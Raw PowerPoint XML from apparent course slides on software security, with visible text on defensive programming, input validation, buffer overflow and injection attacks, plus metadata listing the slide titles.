              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>system use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>pipe / temp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across net use IPSec, TLS/SSL, SSH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etc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Also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detect / handle exceptions /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errors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5166" y="1006855"/>
            <a:ext cx="4607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Handling </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Output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61442"/>
            <a:ext cx="7174865" cy="247396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final concern is program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-1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output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stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for future use, sent over net,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displayed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may be binary or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text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Browser’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cache or other local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storage.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Handling of printed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output.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38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60801" y="1006855"/>
            <a:ext cx="4337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Defensive</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Programming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0739" y="2001265"/>
            <a:ext cx="7601584" cy="436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form of defensive design to ensure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-2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continued  function of </a:t>
            </a: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despite unforeseen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usage</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="581025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Requires attention to all aspects of program  execution, environment, data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processed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Also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>called secure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programming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Assume nothing, check all potential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errors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Rather than just focusing on solving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task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validate all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="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assumptions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OK </a:t>
            </a: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OK </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OK </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not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OK.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96476" y="6962647"/>
            <a:ext cx="12446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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>5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28670" y="1006855"/>
            <a:ext cx="3400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 by</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Design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5065"/>
            <a:ext cx="7851140" cy="454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and reliability are common design goals  in most engineering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disciplines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society not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tolerant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of bridge/plane etc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failures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development is not as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mature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much higher failure levels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tolerated</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="1844675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Despite having a number of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software  development and quality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standards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main focus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general development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lifecycle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increasingly identify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>security 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key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goal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1376" y="1006855"/>
            <a:ext cx="4295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Handling </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input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936865" cy="37014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Incorrect handling a very common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failing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Input is any </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>source </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of data from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outside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data read from keyboard, file,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network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also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execution </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>environment, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>configuration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Must identify all data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sources…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…and explicitly validate assumptions on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and  type of values before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6254" y="1006855"/>
            <a:ext cx="5485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Input </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Size </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Overflow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32874"/>
            <a:ext cx="7291705" cy="423354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Often there are assumptions about </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer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size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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input is only a line of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text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size </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accordingly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>but fail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verify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size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resulting in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer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overflow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Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may not identify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vulnerability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since focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>“normal, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>expected”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inputs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Safe coding treats all input as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-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dangerous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hence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>process so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>protect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8066" y="1006855"/>
            <a:ext cx="39230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Interpretation of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Input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074"/>
            <a:ext cx="7697470" cy="449453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Program input may be binary or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text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binary interpretation depends on encoding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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usually application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specific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text </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in a character set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1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UTF-8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internationalization has increased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variety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also need to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>validate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>interpretation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>before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</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900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1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>email address,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identifier</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="221615" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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Failure to validate may result in an exploitable  vulnerability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2217" y="1006855"/>
            <a:ext cx="30143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Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Attacks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424420" cy="3879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Flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>relating to invalid input handling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>which  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>then influences program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execution</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="30734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often when passed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>helper  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program or other utility or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subsystem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often occurs in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>scripting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languages</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="38227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Propagate through reuse of other programs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/  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>modules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often </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>seen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web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CGI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scripts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spc="-5" dirty="0"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2082</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>353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Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>IT 4823 Information Security Administration</vt:lpstr>
      <vt:lpstr>Software Security</vt:lpstr>
      <vt:lpstr>Software Quality vs Security</vt:lpstr>
      <vt:lpstr>Defensive Programming</vt:lpstr>
      <vt:lpstr>Security by Design</vt:lpstr>
      <vt:lpstr>Handling Program Input</vt:lpstr>
      <vt:lpstr>Input Size and Buffer Overflow</vt:lpstr>
      <vt:lpstr>Interpretation of Input</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Unsafe Perl Script</vt:lpstr>
      <vt:lpstr>Safer Script</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Cross Site Scripting Attacks</vt:lpstr>
      <vt:lpstr>XSS Example</vt:lpstr>
      <vt:lpstr>Validating Input Syntax</vt:lpstr>
      <vt:lpstr>Alternate Encodings</vt:lpstr>
      <vt:lpstr>Validating Numeric Input</vt:lpstr>
      <vt:lpstr>Input Fuzzing</vt:lpstr>
      <vt:lpstr>Writing Safe Program Code</vt:lpstr>
      <vt:lpstr>Correct Algorithm Implementation</vt:lpstr>
      <vt:lpstr>Correct Machine Language</vt:lpstr>
      <vt:lpstr>Correct Data Interpretation</vt:lpstr>
      <vt:lpstr>Correct Use of Memory</vt:lpstr>
      <vt:lpstr>Race Conditions in Shared Memory</vt:lpstr>
      <vt:lpstr>Interacting with O/S</vt:lpstr>
      <vt:lpstr>Environment Variables</vt:lpstr>
      <vt:lpstr>Example Vulnerable Scripts</vt:lpstr>
      <vt:lpstr>Vulnerable Compiled Programs</vt:lpstr>
      <vt:lpstr>Use of Least Privilege</vt:lpstr>
      <vt:lpstr>Root/Admin Programs</vt:lpstr>
      <vt:lpstr>System Calls and  Standard Library Functions</vt:lpstr>
      <vt:lpstr>Secure File Shredder</vt:lpstr>
      <vt:lpstr>Race Conditions</vt:lpstr>
      <vt:lpstr>Safe Temporary Files</vt:lpstr>
      <vt:lpstr>Other Program Interaction</vt:lpstr>
      <vt:lpstr>Handling Program Output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- 4823_15_software_security.pptx</dc:title>
  <dc:creator>bbrown</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-19T19:08:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-19T19:09:26Z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